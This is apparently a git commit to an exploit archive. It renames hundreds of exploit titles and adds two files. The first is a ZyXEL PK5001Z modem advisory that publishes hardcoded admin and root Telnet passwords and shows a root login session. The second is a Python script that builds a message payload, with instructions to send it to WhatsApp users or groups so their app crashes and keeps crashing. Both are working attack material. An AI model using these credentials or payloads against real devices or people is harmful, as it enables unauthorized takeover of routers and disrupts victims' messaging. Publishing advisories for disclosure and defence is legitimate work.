Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
HP Tru64 - Remote Secure Shell User Enumeration Exploit
HP Tru64 - Remote Secure Shell User Enumeration
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit
Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray
Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit
Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray
Data Dynamics ActiveBar - ActiveX (actbar3.ocx 3.1) Insecure Methods
Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods
Savant Web Server 3.1 - GET Remote Overflow (Universal)
Savant Web Server 3.1 - GET Universal Remote Overflow
ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow
Apache Tomcat - WebDAV Remote File Disclosure (SSL)
Apache Tomcat - WebDAV SSL Remote File Disclosure
Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String
VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String
Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (2)
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow
Microsoft Windows Server - Code Execution (MS08-067) (Universal)
Microsoft Windows Server - Universal Code Execution (MS08-067)
SpeedStream 5200 - Authentication Bypass Config Download
SpeedStream 5200 - Authentication Bypass Configuration Download
GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)
GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow
Amaya 11.1 - W3C Editor/Browser 'defer' Stack Overflow
XBMC 8.10 - get tag from file name Remote Buffer Overflow
XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow
FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)
FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow
Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray)
Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray
cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure
cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure
ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure
ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure
Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1)
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)
Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2)
Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)
Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Exploit
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow (Universal)
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow
IBM Informix Client SDK 3.0 - nfx file integer Overflow
IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow
AOL 9.5 - ActiveX Exploit (Heap Spray)
AOL 9.5 - ActiveX Heap Spray Exploit
Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)
Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow
Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)
Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)
Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)
Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal Exploit
Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal Exploit
Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal Exploit
Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)
Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray Exploit (Internet Explorer 6/7)
Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray
Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray
RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)
Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands
RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray
Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow
Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass
Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass
Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081)
Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)
Majordomo2 - Directory Traversal (SMTP/HTTP)
Majordomo2 - 'SMTP/HTTP' Directory Traversal
Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)
Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)
Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)
Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)
Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)
Zend Java Bridge - Remote Code Execution (ZDI-11-113)
Zend Java Bridge - Remote Code Execution
7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)
7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
TFTP Server 1.4 - ST (RRQ) Buffer Overflow
WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter)
TFTP Server 1.4 - ST 'RRQ' Buffer Overflow
WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter)
MailMax 4.6 - POP3 'USER' Remote Buffer Overflow (No Login Needed)
MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow
AN-HTTPd 1.2b - CGI Vulnerabilities
AN-HTTPd 1.2b - CGI Exploits
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution
RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities
RedHat 6.1 / IRIX 6.5.18 - 'lpd' Exploit
Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure
Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure
FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities
FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow
Apache 1.3 - Possible Directory Index Disclosure
Apache 1.3 - Directory Index Disclosure
Microsoft Outlook Express 6 - XML File Attachment Script Execution
Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution
Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure
Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure
Apache Tomcat 3/4 - DefaultServlet File Disclosure
Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure
Apache Tomcat 3.x - Null Byte Directory/File Disclosure
Apache Tomcat 3.x - Null Byte Directory / File Disclosure
Clearswift MAILsweeper 4.x - Malformed MIME Attachment Filter Bypass
Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass
Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit)
Aladdin Knowledge System Ltd - 'ChooseFilePath' Buffer Overflow (Metasploit)
Mod_Gzip 1.3.x - Debug Mode Vulnerabilities
Mod_Gzip 1.3.x - Debug Mode
Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Vulnerabilities
Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun
Microsoft Internet Explorer 6 - Script Execution Vulnerabilities
Microsoft Internet Explorer 6 - Script Execution
OpenSSL - ASN.1 Parsing Vulnerabilities
OpenSSL - ASN.1 Parsing
Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)
Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)
Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Vulnerabilities
Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy
Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation
Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation
Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit
Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Exploit
abctab2ps 1.6.3 - Write_Heading Function ABC File Remote Buffer Overflow
abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow
abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow
abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow
PCAL 4.x - Calendar File getline Buffer Overflow
PCAL 4.x - Calendar File get_holiday Buffer Overflow
PCAL 4.x - Calendar File 'getline' Buffer Overflow
PCAL 4.x - Calendar File 'get_holiday' Buffer Overflow
Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal
Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal
Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention
Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention
Logic Print 2013 - Stack Overflow (vTable Overwrite)
Logic Print 2013 - vTable Overwrite Stack Overflow
EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities
EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure
Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution
Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Vulnerabilities
CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution
Ability Mail Server 2013 (3.1.1) - Persistent
Cross-Site Scripting (Web UI) Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting Microsoft - Tagged Image File Format (TIFF) Integer Overflow (Metasploit) Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit) Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution Multiple Browsers - URI Handlers Command Injection Vulnerabilities Multiple Browsers - URI Handlers Command Injection Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass Vulnerabilities Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass ProFTPd 1.3 - 'mod_sql Username' SQL Injection ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Webpage Remote Code Execution PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities PacketVideo Twonky Server 4.4.17/5.0.65 - 
Cross-Site Scripting / HTML Injection Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities Multiple Check Point Endpoint Security Products - Information Disclosure Bsplayer 2.68 - HTTP Response Exploit (Universal) Bsplayer 2.68 - HTTP Response Universal Exploit Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP) Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP) Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112) Acunetix WVS 10 - Remote Command Execution (System) Acunetix WVS 10 - Remote Command Execution Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution ZyXEL PK5001Z Modem - Backdoor Account PHP-Nuke - SQL Injection Edit/Save Message(s) PHP-Nuke - SQL Injection Edit/Save Messages phpBB - highlight Arbitrary File Upload (Santy.A) phpBB - highlight Arbitrary File Upload 'Santy.A' phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm) phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm' Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial) Invision Power Board 2.0.3 - 'login.php' SQL Injection phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber) phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber) vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3) vBulletin 3.0.8 - Accessible Database Backup Searcher (3) ibProArcade 2.x - module (vBulletin/IPB) SQL Injection ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection Website Baker 2.6.0 - Login Bypass / Remote Code Execution 
Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection) WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion E Annu 1.0 - Login Bypass (SQL Injection) E Annu 1.0 - Authentication Bypass / SQL Injection ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection' ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection) paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed) e107 0.7.8 - 'mailout.php' Authenticated Access Escalation Exploit TaskDriver 1.2 - Login Bypass / SQL Injection TaskDriver 1.2 - Authentication Bypass / SQL Injection IBM Rational ClearQuest - Web Login Bypass (SQL Injection) IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities Joomla! 
Component JoomlaXplorer 1.6.2 - Remote Exploits Xomol CMS 1.2 - Login Bypass / Local File Inclusion Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) cPanel 11.x - 'Fantastico' Local File Inclusion mxCamArchive 2.2 - Bypass Config Download mxCamArchive 2.2 - Bypass Configuration Download All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit All Club CMS 0.0.2 - Remote Database Configuration Retrieve Exploit OraMon 2.0.1 - Remote Config File Disclosure OraMon 2.0.1 - Remote Configuration File Disclosure Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing phpScribe 0.9 - 'user.cfg' Remote Config Disclosure phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure BlogHelper - Remote Config File Disclosure PollHelper - Remote Config File Disclosure BlogHelper - Remote Configuration File Disclosure PollHelper - Remote Configuration File Disclosure QuoteBook - Remote Config File Disclosure QuoteBook - Remote Configuration File Disclosure Free Joke Script 1.0 - Authentication Bypass / SQL Injection Free Joke Script 1.0 - Authentication Bypass Grestul 1.x - Authentication Bypass (Cookie SQL Injection) Grestul 1.x - Cookie Authentication Bypass S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities smNews 1.0 - Authentication Bypass / Column Truncation Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload phpAdBoard - 'conf.inc' Remote Config File Disclosure phpAdBoard - 'conf.inc' Remote Configuration File Disclosure W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure phpAdBoardPro - 'config.inc' Config File Disclosure W2B Restaurant 
1.2 - 'conf.inc' Configuration File Disclosure phpAdBoardPro - 'config.inc' Configuration File Disclosure Job2C - 'conf.inc' Config File Disclosure Job2C - 'conf.inc' Configuration File Disclosure chCounter 3.1.3 - (Authentication Bypass) SQL Injection chCounter 3.1.3 - Authentication Bypass The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup The Recipe Script 5 - Authentication Bypass / Database Backup Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection Mlffat 2.1 - Cookie Authentication Bypass my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting Flash Image Gallery 1.1 - Arbitrary Config File Disclosure Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection Traidnt Up 2.0 - Cookie Authentication Bypass LightNEasy sql/no-db 2.2.x - System Config Disclosure LightNEasy sql/no-db 2.2.x - System Configuration Disclosure MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection WHOISCART - (Authentication Bypass) Information Disclosure WHOISCART - Authentication Bypass / Information Disclosure ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure mobilelib gold 3.0 - Authentication Bypass / SQL Injection Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection Arab Portal 2.2 - Blind Cookie Authentication Bypass Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype) Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection Joomla! Component com_virtuemart 1.0 - SQL Injection (Product_ID) Joomla! 
Component com_virtuemart 1.0 - 'Product_ID' SQL Injection Pre Job Board 1.0 - SQL Authentication Bypass Pre Job Board 1.0 - Authentication Bypass Pre Jobo .NET - SQL Authentication Bypass Pre Jobo .NET - Authentication Bypass SoftCab Sound Converter - ActiveX Insecure Method Exploit (sndConverter.ocx) SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method Exploit WSC CMS - (Authentication Bypass) SQL Injection WSC CMS - Authentication Bypass Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid) Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection 3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal) 3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval Yamamah Photo Gallery 1.00 - SQL Injection (calbums) Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection Elite Gaming Ladders 3.5 - SQL Injection (ladder[id]) Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery AV Arcade 3 - Cookie SQL Injection / Authentication Bypass AV Arcade 3 - Cookie Authentication Bypass MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection) MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload Seotoaster - SQL Injection Admin Login Bypass Seotoaster - SQL Injection BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities phpBB 1.x/2.0.x - '(Knowledge Base 
Module) 'KB.php' SQL Injection phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution Spid 1.3 - lang_path File Inclusion Spid 1.3 - 'lang_path' File Inclusion NETGEAR WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Configuration Download TWiki 4.0.x - Viewfile Directory Traversal TWiki 4.0.x - 'Viewfile' Directory Traversal ZonPHP 2.25 - Remote Code Execution (Remote Code Execution) ZonPHP 2.25 - Remote Code Execution pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass Vulnerabilities LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Vulnerabilities LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset) Ability Mail Server 2013 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset) WiFiles HD 1.3 iOS - Locla File Inclusion WiFiles HD 1.3 iOS - Local File Inclusion IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / 
HTML Injection Vulnerabilities IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit) Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python) vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting ZTE F660 - Remote Config Download ZTE F660 - Remote Configuration Download Tango DropBox 3.1.5 + PRO - Activex Heap Spray Tango FTP 1.0 (Build 136) - Activex Heap Spray Tango DropBox 3.1.5 + PRO - Activex HeapSpray Tango FTP 1.0 (Build 136) - Activex HeapSpray Pinterestclones - Security Bypass / HTML Injection Vulnerabilities Pinterestclones - Security Bypass / HTML Injection Privoxy Proxy - Authentication Information Disclosure Vulnerabilities Privoxy Proxy - Authentication Information Disclosure ZTE ZXHN H108N Router - Unauthenticated Config Disclosure ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection Kodi 15 - Arbitrary File Access (Web Interface) Kodi 15 - Web Interface Arbitrary File Access ( OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit OpenMRS 2.3 (1.11.4) - XML External Entity Processing Exploit OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery Ingenious School Management System 2.3.0 - 'friend_index' SQL injection
parent 33cc894818
commit c66d2f584e
7 changed files with 633 additions and 404 deletions
41 platforms/hardware/remote/43105.txt Executable file
@ -0,0 +1,41 @@
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
# Google Dork: n/a
# Date: 2017-10-31
# Exploit Author: Matthew Sheimo
# Vendor Homepage: https://www.zyxel.com/
# Software Link: n/a
# Version: PK5001Z 2.6.20.19
# Tested on: Linux
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
# Linked CVE's: CVE-2016-10401


Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet

username: admin
password: CenturyL1nk

Escalate to root with 'su' and this password.

password: zyad5001


[root:/]# telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

PK5001Z login: admin
Password: CenturyL1nk
$ whoami
admin_404A03Tel
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name: ZyXEL Communications Corp.


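Review bot: the advisory stops at demonstrating the credentials and gives operators of this modem no remediation guidance. Since the header already links CVE-2016-10401, add a line stating whether a ZyXEL/CenturyLink firmware update addresses the hardcoded accounts and, failing that, that the Telnet service on the device should be disabled or filtered. Minor: `# Tested on: Linux` is ambiguous here, because the session itself shows the target running Linux 2.6.20.19 on MIPS; say which side that line describes.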
51 platforms/ios/dos/43107.py Executable file
@ -0,0 +1,51 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Found this and more exploits on my open source security project: http://www.exploitpack.com
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Date and time of release: 11 October 2017
#
# Tested on: iPhone 5/6s iOS 10.3.3 and 11
#
# Description:
# WhatsApp 2.17.52 and prior is prone to a remote memory corruption.
# This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary.
#
# Impact:
# Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception
# in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption.
#
# Warning note:
# Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history.
#
# Timeline:
# 09/13/2017 - Research started
# 09/13/2017 - First proof of concept
# 09/15/2017 - Reported to Whatsapp
# 09/20/2017 - Report Triaged by Facebook
# 11/01/2017 - Facebook never replied back with a status fix
# 11/01/2017 - Disclosure as zero day
# Vendor homepage: http://www.whatsapp.com
import sys
reload(sys)

def whatsapp(filename):
    sys.setdefaultencoding("utf-8")
    payload = u'ب ة ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن' * 1337
    sutf8 = payload.encode('UTF-8')
    print "[*] Writing to file: " + filename
    open(filename, 'w').write(payload)
    print "[*] Done."

def howtouse():
    print "Usage: whatsapp.py [FILENAME]"
    print "[*] Mandatory arguments:"
    print "[-] FILENAME"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco"
        print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group"
        whatsapp(sys.argv[1])
    except IndexError:
        howtouse()
